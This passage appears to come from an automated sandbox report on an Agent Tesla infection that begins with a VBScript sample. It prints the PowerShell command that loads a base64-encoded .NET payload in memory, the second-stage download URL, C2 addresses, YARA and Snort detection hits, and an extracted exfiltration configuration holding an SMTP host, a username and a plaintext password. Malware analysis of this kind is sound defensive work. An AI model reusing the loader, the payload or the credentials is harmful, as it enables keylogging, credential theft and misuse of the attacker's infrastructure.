MAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAALQ0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] (' ??v?}???@+@ ?@@ ??v?}??.so!}( }4}? ?4*?*?#:?*(+ (*(+ (v.4*?*?#:?sr8*??(su4*?*?#:?4}? ?lo_8*??(garo ??v?}??s4*?*?#:?!}( }il*(+ (up4*?*?#:?4}? ?m. ??v?}??n8*??(r8*??(girf8*??(rkroy4*?*?#:?4*?*?#:??? }??+?sp ??v?}?? ??v?}???*(??@*?')) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • RegSvcs.exe (PID: 1236 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.hermosanairobi.com", "Username": "security@hermosanairobi.com", "Password": "    mcdsew70@_+lks44          "}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth (Nextron Systems)
  • 0x6979a:$s5: AEAAAAMAAQqVT
  • 0x6970b:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.317073094.0000028B41F4C000.00000004.00000800.00020000.00000000.sdmpSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth (Nextron Systems)
  • 0x27ac3:$s5: AEAAAAMAAQqVT
  • 0x27a34:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000001.00000002.311807350.0000028B3235B000.00000004.00000800.00020000.00000000.sdmpSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth (Nextron Systems)
  • 0x1270:$s5: AEAAAAMAAQqVT
  • 0x11e1:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.311807350.0000028B3235F000.00000004.00000800.00020000.00000000.sdmpSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth (Nextron Systems)
      • 0x14a2b:$s5: AEAAAAMAAQqVT
      • 0x1499c:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
      Click to see the 4 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.powershell.exe.28b32159f18.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_4464.amsi.csvWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth (Nextron Systems)
        • 0xda:$s1: .CreateObject("WScript.Shell")
        • 0x10c:$p1: powershell.exe

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.2.5192.81.170.349696262851779 03/20/23-11:39:22.276555
        SID:2851779
        Source Port:49696
        Destination Port:26
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: GJ890-1286.vbsReversingLabs: Detection: 12%
        Source: 3.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
        Source: 3.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.hermosanairobi.com", "Username": "security@hermosanairobi.com", "Password": " mcdsew70@_+lks44 "}
        Source: unknownHTTPS traffic detected: 195.178.106.125:443 -> 192.168.2.5:49695 version: TLS 1.0

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49696 -> 192.81.170.3:26
        Yara detected Generic Downloader
        Source: Yara matchFile source: 1.2.powershell.exe.28b32159f18.0.raw.unpack, type: UNPACKEDPE
        Source: Joe Sandbox ViewASN Name: AS-UPTIMECA AS-UPTIMECA
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: global trafficHTTP traffic detected: GET /public/storage_old/users/.vbb/dcos.txt HTTP/1.1Host: yorkrefrigerent.mdConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 192.81.170.3 192.81.170.3
        Source: Joe Sandbox ViewIP Address: 195.178.106.125 195.178.106.125
        Source: unknownHTTPS traffic detected: 195.178.106.125:443 -> 192.168.2.5:49695 version: TLS 1.0
        Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
        Source: powershell.exe, 00000001.00000002.319201526.0000028B4A443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: RegSvcs.exe, 00000003.00000002.822490552.0000000002BF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hermosanairobi.com
        Source: RegSvcs.exe, 00000003.00000002.822490552.0000000002BF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.hermosanairobi.com
        Source: powershell.exe, 00000001.00000002.311807350.0000028B31EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000001.00000002.311807350.0000028B3233C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yorkrefrigerent.md
        Source: powershell.exe, 00000001.00000002.311807350.0000028B32329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yorkrefrigerent.md
        Source: powershell.exe, 00000001.00000003.310430015.0000028B4A5B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.311807350.0000028B320F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yorkrefrigerent.md/public/storage_old/users/.vbb/dcos.txt
        Source: powershell.exe, 00000001.00000002.311807350.0000028B32336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yorkrefrigerent.mdx
        Source: unknownDNS traffic detected: queries for: yorkrefrigerent.md
        Source: global trafficHTTP traffic detected: GET /public/storage_old/users/.vbb/dcos.txt HTTP/1.1Host: yorkrefrigerent.mdConnection: Keep-Alive

        System Summary

        barindex
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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 to behavior
        Very long command line found
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16166
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16166Jump to behavior
        Source: amsi64_4464.amsi.csv, type: OTHERMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth (Nextron Systems), description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: sslproxydump.pcap, type: PCAPMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
        Source: 00000001.00000002.317073094.0000028B41F4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
        Source: 00000001.00000002.311807350.0000028B3235B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
        Source: 00000001.00000002.311807350.0000028B3235F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
        Source: 00000001.00000002.317073094.0000028B41FAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
        Source: Process Memory Space: powershell.exe PID: 6008, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF9A5A720C91_2_00007FF9A5A720C9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00F4A9D83_2_00F4A9D8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00F4C9983_2_00F4C998
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00F49DC03_2_00F49DC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00F4A1083_2_00F4A108
        Source: GJ890-1286.vbsInitial sample: Strings found which are bigger than 50
        Source: GJ890-1286.vbsReversingLabs: Detection: 12%
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GJ890-1286.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
